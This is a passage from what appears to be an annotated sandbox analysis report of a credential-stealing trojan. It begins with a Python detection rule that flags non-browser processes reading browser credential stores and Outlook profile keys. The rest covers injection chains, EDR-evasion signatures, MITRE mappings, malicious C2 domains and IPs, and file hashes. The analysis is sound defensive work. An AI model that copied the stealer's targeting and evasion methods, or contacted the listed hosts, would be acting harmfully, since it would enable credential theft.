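# User Data root, while the report also shows a lookup under Default\, so the
# pattern accepts any depth below "User Data".
BROWSER_STORE_RE = re.compile(
    r"\\(?:Google\\Chrome|Microsoft\\Edge|BraveSoftware\\Brave-Browser)\\User Data\\"
    r"(?:.*\\)?(?:Login Data|Cookies|Web Data|Local State)$",
    re.IGNORECASE,
)
# Outlook profile locations: the Windows Messaging Subsystem key from the report
# and the per-version Office key (assumption: "Office\<ver>\Outlook\Profiles").
MAIL_KEY_RE = re.compile(
    r"\\(?:Windows Messaging Subsystem\\Profiles|Office\\\d+\.\d\\Outlook\\Profiles)(?:\\|$)",
    re.IGNORECASE,
)

BROWSER_OWNERS = {"chrome.exe", "msedge.exe", "brave.exe"}
MAIL_OWNERS = {"outlook.exe"}


def classify(event: dict):
    """Return an alert dict for a suspicious access, else None."""
    image = ntpath.basename(event["image"]).lower()
    target = event["target"]
    if event["kind"] == "file" and BROWSER_STORE_RE.search(target):
        if image not in BROWSER_OWNERS:
            return {"image": image, "category": "browser credential store", "target": target}
    elif event["kind"] == "registry" and MAIL_KEY_RE.search(target):
        if image not in MAIL_OWNERS:
            return {"image": image, "category": "mail profile key", "target": target}
    return None


def triage(events: list) -> list:
    return [alert for alert in map(classify, events) if alert]


def score(events: list) -> dict:
    """Distinct categories hit per image; one image hitting both browser stores
    and mail keys is the stealer shape this report shows for netbtugc.exe."""
    per_image = {}
    for alert in triage(events):
        per_image.setdefault(alert["image"], set()).add(alert["category"])
    return {image: len(categories) for image, categories in per_image.items()}


# Constructed events: the report's netbtugc.exe accesses, benign accesses by the
# owning applications, and an unrelated file (History) that the rule ignores.
EVENTS = [
    {"image": r"C:\Windows\SysWOW64\netbtugc.exe", "kind": "file",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"image": r"C:\Windows\SysWOW64\netbtugc.exe", "kind": "file",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"},
    {"image": r"C:\Windows\SysWOW64\netbtugc.exe", "kind": "file",
     "target": r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"},
    {"image": r"C:\Windows\SysWOW64\netbtugc.exe", "kind": "registry",
     "target": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\"},
    {"image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "kind": "file",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE", "kind": "registry",
     "target": r"HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook"},
    {"image": r"C:\Windows\SysWOW64\netbtugc.exe", "kind": "file",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History"},
]

if __name__ == "__main__":
    for alert in triage(EVENTS):
        print(f"{alert['image']}: {alert['category']} -> {alert['target']}")
    print(score(EVENTS))
```

Backup agents, password managers and browser-sync tools legitimately read these files, so a rule like this is a correlation input rather than a verdict: here the decisive context is the lineage, since netbtugc.exe was spawned by a process the sample had injected into. The rule also covers only what the report lists; Firefox's logins.json and key4.db would need their own pattern.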

            Remote Access Functionality

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000004.00000002.4479452466.0000000003220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4482452521.0000000004C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4479040765.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4480467614.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2236251136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2237968521.0000000003E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2238057070.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4480505595.0000000004270000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DF112B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DF172D socket,WSAGetLastError,bind,WSAGetLastError,closesocket,
            MITRE ATT&CK Matrix

            Rebuilt from the flattened matrix and grouped by tactic column. A leading number marks a technique that the report's signatures matched and gives the number of matching signatures; entries without a number are the matrix's unmatched placeholder cells.

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
            Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
            Execution: 1 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
            Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
            Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 412 Process Injection; Startup Items; Scheduled Task/Job; At
            Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 12 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 412 Process Injection
            Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
            Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 116 System Information Discovery; 241 Security Software Discovery; 12 Virtualization/Sandbox Evasion; 3 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
            Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
            Command and Control: 5 Ingress Tool Transfer; 1 Encrypted Channel; 5 Non-Application Layer Protocol; 5 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
            Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
            Behavior Graph (ID: 1513227, Sample: PAGO $830.900.exe, Start date: 18/09/2024, Architecture: WINDOWS, Score: 100)

            Start node
              Domains/IPs: www.woshop.online; www.tekilla.wtf; 21 other IPs or domains
              Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 7 other signatures
              PAGO $830.900.exe [2], started
                Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process
                svchost.exe, started
                  Signatures: Maps a DLL or memory area into another process
                  XXOIkqUXwzoOEy.exe, injected
                    Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                    netbtugc.exe [13], started
                      Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                      XXOIkqUXwzoOEy.exe, injected
                        Domains/IPs: www.nobartv6.website 103.224.182.242, ports 53651, 53652, 53653 (TRELLIAN-AS-AP Trellian Pty Limited AU, Australia); www.kexweb.top 63.250.47.40, ports 53631, 53632, 53633 (NAMECHEAP-NET US, United States); 10 other IPs or domains
                        Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                      firefox.exe, started
            (Bracketed numbers are the per-node counts shown on the graph nodes.)

            SourceDetectionScannerLabelLink
            PAGO $830.900.exe62%ReversingLabsByteCode-MSIL.Trojan.Remcos
            PAGO $830.900.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
IP | Domain | Country | ASN | ASN Name | Malicious
63.250.47.40 | www.kexweb.top | United States | 22612 | NAMECHEAP-NETUS | true
13.248.169.48 | www.dyme.tech | United States | 16509 | AMAZON-02US | true
91.184.0.200 | jobworklanka.online | Netherlands | 197902 | HOSTNETNL | true
103.224.182.242 | www.nobartv6.website | Australia | 133618 | TRELLIAN-AS-APTrellianPtyLimitedAU | true
148.72.152.174 | www.elsupertodo.net | United States | 30083 | AS-30083-GO-DADDY-COM-LLCUS | true
85.159.66.93 | natroredirect.natrocdn.com | Turkey | 34619 | CIZGITR | true
172.191.244.62 | redirect.3dns.box | United States | 7018 | ATT-INTERNET4US | true
172.96.191.39 | bola88site.one | Canada | 59253 | LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG | true
188.114.97.3 | www.chinaen.org | European Union | 13335 | CLOUDFLARENETUS | true
217.70.184.50 | webredir.vip.gandi.net | France | 29169 | GANDI-ASDomainnameregistrar-httpwwwgandinetFR | true
3.33.130.190 | omexai.info | United States | 8987 | AMAZONEXPANSIONGB | true
43.242.202.169 | www.mizuquan.top | Hong Kong | 40065 | CNSERVERSUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1513227
Start date and time: 2024-09-18 16:16:31 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 20s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PAGO $830.900.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@20/12
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 43
• Number of non-executed functions: 290
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 92.204.80.11
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, whois-unverified.domainbox.akadns.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• VT rate limit hit for: PAGO $830.900.exe
Time | Type | Description
10:18:16 | API Interceptor | 12962835x Sleep call for process: netbtugc.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
63.250.47.40 | k8FSEGGo4d9blGr.exe | malicious | FormBook | www.balclub.top/n6ow/
63.250.47.40 | PO #86637.exe | malicious | FormBook | www.kexweb.top/3bdq/
63.250.47.40 | COTIZACION 290824.exe | malicious | FormBook | www.kexweb.top/3bdq/
63.250.47.40 | ORDER_pdf.exe | malicious | FormBook | www.kexweb.top/mfb2/
63.250.47.40 | ORDER_38746_pdf.exe | malicious | FormBook | www.kexweb.top/mfb2/
13.248.169.48 | GestionPagoAProveedores_100920241725998901306_PDF.cmd | malicious | Remcos, DBatLoader, FormBook | www.sleephygienist.org/9ned/
13.248.169.48 | NEW ORDERS scan_29012019.exe | malicious | FormBook | www.luxe.guru/s9un/
13.248.169.48 | Petronas request for-quotation.exe | malicious | FormBook | www.smilechat.shop/ih4n/
13.248.169.48 | New Purchase Order.exe | malicious | FormBook | www.sapatarias.online/ep7t/
13.248.169.48 | PROFORMA INVOICE BKS-0121-24-25-JP240604.exe | malicious | FormBook | www.healthsolutions.top/cent/
13.248.169.48 | New Purchase Order.exe | malicious | FormBook | www.dyme.tech/pjne/?lt=lhp2AL1o8WnbXPZMRwuNwZPsCjGMimAytiXH6n0uWTdA0JaaykggGBvZUdK/udhaMgulQSxiSbl+DIpIo1gQvhEzJQCgKGJIbKmEGc+7pbgyQptTpIVqrWg=&3ry=nj20Xr
13.248.169.48 | OjKmJJm2YT.exe | malicious | Simda Stealer | pupydeq.com/login.php
13.248.169.48 | 5AFlyarMds.exe | malicious | Simda Stealer | pupydeq.com/login.php
13.248.169.48 | Scan 00093847.exe | malicious | FormBook | www.dyme.tech/pjne/
13.248.169.48 | uB31aJH4M0.exe | malicious | Simda Stealer | pupydeq.com/login.php
91.184.0.200 | FATURALAR PDF.exe | malicious | FormBook | www.jobworklanka.online/hxxx/
91.184.0.200 | PASU5160894680 DOCS.scr.exe | malicious | FormBook | www.jobworklanka.online/c85h/
91.184.0.200 | PO #86637.exe | malicious | FormBook | www.jobworklanka.online/ikh0/
91.184.0.200 | DEBIT NOTE July 2024 PART 2.exe | malicious | FormBook | www.jobworklanka.online/c85h/
91.184.0.200 | COTIZACION 290824.exe | malicious | FormBook | www.jobworklanka.online/ikh0/
91.184.0.200 | ORDER_pdf.exe | malicious | FormBook | www.synthtv.online/h2pg/
91.184.0.200 | GOVT __OF SHARJAH - UNIVERSITY OF SHARJAH - Project 0238.exe | malicious | FormBook | www.jobworklanka.online/lxkz/
91.184.0.200 | bintoday1.exe | malicious | FormBook | www.jobworklanka.online/mm14/
91.184.0.200 | ORDER_38746_pdf.exe | malicious | FormBook | www.synthtv.online/h2pg/
91.184.0.200 | P240842_P240843.exe | malicious | FormBook, PureLog Stealer | www.durkal.online/ht3d/?LjqdxdN0=wyJlkAZPRef/xyPbhfrWrGGI/Xeqxm4pcr0IjHYue8o6lYTmszTOgufsq9uZLmD6QeIH&_Td4vT=ZL3P5PGPdr
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.dyme.tech | New Purchase Order.exe | malicious | FormBook | 13.248.169.48
www.dyme.tech | New Purchase Order.exe | malicious | FormBook | 13.248.169.48
www.dyme.tech | Scan 00093847.exe | malicious | FormBook | 13.248.169.48
www.dyme.tech | doc330391202408011.exe | malicious | FormBook | 13.248.169.48
www.dyme.tech | PO #86637.exe | malicious | FormBook | 13.248.169.48
www.dyme.tech | REQST_PRC 410240665_2024.exe | malicious | FormBook | 13.248.169.48
www.dyme.tech | REQST_PRC 410240.exe | malicious | FormBook | 13.248.169.48
www.dyme.tech | COTIZACION 290824.exe | malicious | FormBook | 13.248.169.48
www.dyme.tech | REQUEST FOR QUOTATION.exe | malicious | FormBook, GuLoader | 13.248.169.48
www.dyme.tech | INVG0088 LHV3495264 BL327291535V.exe | malicious | FormBook | 13.248.169.48
www.chinaen.org | Petronas request for-quotation.exe | malicious | FormBook | 188.114.96.3
www.chinaen.org | r9856_7.exe | malicious | FormBook | 188.114.96.3
www.chinaen.org | Jsn496Em5T.exe | malicious | FormBook | 188.114.96.3
www.chinaen.org | yyyyyyyy.exe | malicious | FormBook | 188.114.96.3
www.chinaen.org | 6i4QCFbsNi.exe | malicious | FormBook | 188.114.97.3
www.chinaen.org | PO #86637.exe | malicious | FormBook | 188.114.96.3
www.chinaen.org | Curriculum Vitae.exe | malicious | FormBook | 188.114.96.3
webredir.vip.gandi.net | PROFOMA INVOICE SHEET.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | FATURALAR PDF.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | Order#Qxz091124.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | DOC092024-0431202229487.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | PO #86637.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | au1FjlRwFR.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | COTIZACION 290824.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | Scan_000019921929240724_PDA _ SOA_Payment Reference TR-37827392-2024-08-29.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | COMMERCAIL INVOICE AND AWB TRACKING DETAILS.exe | malicious | FormBook | 217.70.184.50
www.elsupertodo.net | FATURALAR PDF.exe | malicious | FormBook | 148.72.152.174
www.elsupertodo.net | PO #86637.exe | malicious | FormBook | 148.72.152.174
www.elsupertodo.net | COTIZACION 290824.exe | malicious | FormBook | 148.72.152.174
www.elsupertodo.net | COTIZACION 280824.exe | malicious | FormBook | 148.72.152.174
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TRELLIAN-AS-APTrellianPtyLimitedAU | https://shop.oebbticket.at | malicious | Phisher | 103.224.182.242
TRELLIAN-AS-APTrellianPtyLimitedAU | http://www.nsdta.ca/registered-labs/ | malicious | Unknown | 103.224.212.213
TRELLIAN-AS-APTrellianPtyLimitedAU | http://football-booster.freevisit1.com/hs-football.php?live=Greendale%20vs%20Milwaukee%20Lutheran | malicious | Unknown | 103.224.182.253
TRELLIAN-AS-APTrellianPtyLimitedAU | OjKmJJm2YT.exe | malicious | Simda Stealer | 103.224.182.252
TRELLIAN-AS-APTrellianPtyLimitedAU | 5AFlyarMds.exe | malicious | Simda Stealer | 103.224.182.252
TRELLIAN-AS-APTrellianPtyLimitedAU | uB31aJH4M0.exe | malicious | Simda Stealer | 103.224.182.252
TRELLIAN-AS-APTrellianPtyLimitedAU | firmware.armv7l.elf | malicious | Unknown | 103.224.182.246
TRELLIAN-AS-APTrellianPtyLimitedAU | firmware.mipsel.elf | malicious | Unknown | 103.224.182.246
TRELLIAN-AS-APTrellianPtyLimitedAU | PO #86637.exe | malicious | FormBook | 103.224.182.242
TRELLIAN-AS-APTrellianPtyLimitedAU | https://www.has-construction.com/ | malicious | Unknown | 103.224.182.242
AMAZON-02US | https://dltxc.s3.ap-southeast-1.amazonaws.com/svs/wx.htm?eml=test@yahoo.com | malicious | HTMLPhisher | 3.5.149.122
AMAZON-02US | https://demo.services.docusign.net/webforms-ux/v1.0/forms/10bc61c9dc8dd4ea79884f1c0703f644 | malicious | HTMLPhisher | 13.32.110.96
AMAZON-02US | https://abena.dotling.com/ | malicious | Unknown | 13.32.99.19
AMAZON-02US | file.exe | malicious | LummaC, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, Xmrig | 185.166.143.50
AMAZON-02US | Modulo32_.jar | malicious | Unknown | 3.131.123.134
AMAZON-02US | Prodotto.jar | malicious | Unknown | 3.23.182.29
AMAZON-02US | Modulo32_.jar | malicious | Unknown | 3.130.209.29
AMAZON-02US | Prodotto.jar | malicious | Unknown | 3.23.182.29
AMAZON-02US | hisense.exe | malicious | Unknown | 3.5.218.57
AMAZON-02US | hisense.exe | malicious | Unknown | 54.231.195.249
HOSTNETNL | FATURALAR PDF.exe | malicious | FormBook | 91.184.0.200
HOSTNETNL | PASU5160894680 DOCS.scr.exe | malicious | FormBook | 91.184.0.200
HOSTNETNL | z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe | malicious | FormBook | 91.184.0.111
HOSTNETNL | firmware.x86_64.elf | malicious | Unknown | 91.184.0.99
HOSTNETNL | PO #86637.exe | malicious | FormBook | 91.184.0.200
HOSTNETNL | DEBIT NOTE July 2024 PART 2.exe | malicious | FormBook | 91.184.0.200
HOSTNETNL | COTIZACION 290824.exe | malicious | FormBook | 91.184.0.200
HOSTNETNL | ORDER_pdf.exe | malicious | FormBook | 91.184.0.200
HOSTNETNL | GOVT __OF SHARJAH - UNIVERSITY OF SHARJAH - Project 0238.exe | malicious | FormBook | 91.184.0.200
HOSTNETNL | bintoday1.exe | malicious | FormBook | 91.184.0.200
NAMECHEAP-NETUS | https://www.google.com/url?q=https://www.google.com/url?q=https://www.google.com/url?q=https://www.google.com/url?q=https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wD6jzGRyycT&sa=t&esrc=6jzGRFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ1GcDqhlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fanoboy.pw%2Fojo%2Flok%2F9198595720/#a2FybC5ib25uZXJAYXR1Lmll=$%E3%80%82 | malicious | EvilProxy, HTMLPhisher | 162.0.228.73
NAMECHEAP-NETUS | https://urlz.fr/sarO | malicious | Unknown | 63.250.43.136
NAMECHEAP-NETUS | https://thomasuhe-f90d31.ingress-florina.ewp.live/wp-content/plugins/agrinotcc/pages/region.php?lca#3f735a1f7f42382ab | malicious | Unknown | 63.250.43.137
NAMECHEAP-NETUS | https://urlz.fr/s08e | malicious | Unknown | 63.250.43.14
NAMECHEAP-NETUS | https://dhbgry-f2f2b7.ingress-daribow.ewp.live/wp-content/plugins/sdnww/pages/region.php | malicious | Unknown | 63.250.43.14
NAMECHEAP-NETUS | https://thunderay-f90d31.ingress-florina.ewp.live/wp-content/plugins/agrinotcc/pages/region.php?lca | malicious | Unknown | 63.250.43.136
NAMECHEAP-NETUS | https://thunderay-f90d31.ingress-florina.ewp.live/wp-content/plugins/agrinotcc/pages/region.php?lca#cd8cc958ad7945feb | malicious | Unknown | 63.250.43.137
NAMECHEAP-NETUS | https://urlz.fr/saHm | malicious | Unknown | 63.250.43.136
NAMECHEAP-NETUS | https://londonu-f90d31.ingress-bonde.ewp.live/wp-content/plugins/agrinotcc/pages/region.php?lca | malicious | Unknown | 63.250.43.1
NAMECHEAP-NETUS | https://urlz.fr/s9Ar | malicious | Unknown | 63.250.43.1
                                                        No context
                                                        No context
Process: C:\Windows\SysWOW64\netbtugc.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.121297215059106
Encrypted: false
SSDEEP: 384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5: D87270D0039ED3A5A72E7082EA71E305
SHA1: 0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256: F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512: 18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious: false
Reputation: high, very likely benign file
                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\PAGO $830.900.exe
File Type: data
Category: dropped
Size (bytes): 286720
Entropy (8bit): 7.9954352178268016
Encrypted: true
SSDEEP: 3072:GkD9tuQ/haPP1G1Jf6mPNBD00G37hAklC+30pDi88jHOCGPDRWefI/9v0vIbEZJK:nqky0PXPN8t/kxVlCweB0vIbEZJLm
MD5: 10E120E14086B94DA73431F0A9F55FA4
SHA1: 3499E9967B6658AF78C8198557D0394E97F33EFB
SHA-256: B619B3F545939E5C96F741E1C8424FD196FA94C3C5EA595BE357AF02A5E929EF
SHA-512: 048AD861B64A4777D8D504A19052291731BB6BC9BE42CB5080D835E6CA9E6DF4A9D3CA0FA962B28B41C50615843B9C9CCFF8B6BB0F1B5CD6CF5307D001803C24
Malicious: false
Reputation: low
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.166049228254655
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: PAGO $830.900.exe
File size: 1'280'512 bytes
MD5: 39c39d298ac66acb85c47e7a647bac4e
SHA1: a2d7ec0eaa52cd8287926c198052dbd99e7366a1
SHA256: 79a2f729b9a56bea58b706b9246e46d6204ae30c549fdbe6bc044e80624947e3
SHA512: 66b4a5d1b63ef20b8a764545a09cf0cd3e61a9a9fe181aedeba6d8877c5cd1995246f90efbe50c8b748b1a5fbf1d5175ce615f92ccba920e05fdb3f0f33b5571
SSDEEP: 24576:Q5EmXFtKaL4/oFe5T9yyXYfP1ijXdaTUWV8sFXU+y7KXH0SvpvZx:QPVt/LZeJbInQRaTxV82lBj
TLSH: 6155BF0273C1C062FFAB92734F5AF6115ABC79260123A61F13981DB9BE705B1563E7A3
File Content Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
Icon Hash: aaf3e3e3938382a0
Entrypoint: 0x4204f7
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x66E44893 [Fri Sep 13 14:13:39 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 0b768923437678ce375719e30b21693e
Instruction
call 00007FDF60EF8C83h
jmp 00007FDF60EF858Fh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FDF60EF876Dh
mov dword ptr [esi], 0049FE10h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE18h
mov dword ptr [ecx], 0049FE10h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FDF60EF873Ah
mov dword ptr [esi], 0049FE2Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE34h
mov dword ptr [ecx], 0049FE2Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDF0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007FDF60EFB33Dh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDF0h
push eax
call 00007FDF60EFB388h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDF0h
push eax
call 00007FDF60EFB371h
test byte ptr [ebp+08h], 00000001h
pop ecx
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e74 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0x61f88 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x136000 | 0x75cc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb1010 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc3420 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1030 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
